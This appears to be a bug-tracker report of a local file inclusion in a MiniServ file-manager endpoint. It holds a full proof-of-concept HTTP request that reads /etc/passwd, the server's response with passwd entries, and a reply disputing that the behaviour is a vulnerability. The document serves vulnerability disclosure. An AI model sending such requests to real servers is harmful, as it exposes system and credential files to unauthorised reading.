#480 Local File Inclusion in /file/show.cgi/
Low-privileged user can exploit a local file include vulnerability. It is possible to retrieve configuration files from the remote system.
Proof-of-Concept:
GET /file/show.cgi/etc/passwd HTTP/1.1
Host: 10.0.0.5:20000
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:69.0) Gecko/20100101 Firefox/69.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: redirect=1; testing=1; usid=b13f01f0151e6eea18ed9994bd77393f
Upgrade-Insecure-Requests: 1
HTTP/1.0 200 Document follows
Date: Mon, 21 Oct 2019 06:41:42 GMT
Server: MiniServ/1.780
Connection: close
X-no-links: 1
Content-length: 2485
X-Content-Type-Options: nosniff
Content-type: text/plain; charset=windows-1251
root❌0:0:root:/root:/bin/bash
daemon❌1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin❌2:2:bin:/bin:/usr/sbin/nologin
sys❌3:3:sys:/dev:/usr/sbin/nologin
sync❌4:65534:sync:/bin:/bin/sync
games❌5:60:games:/usr/games:/usr/sbin/nologin
man❌6:12:man:/var/cache/man:/usr/sbin/nologin
lp❌7:7:lp:/var/spool/lpd:/usr/sbin/nologin
[...]
I don't see how that's a vulnerability - the while point of the file manager module is to allow users to browse files on the server.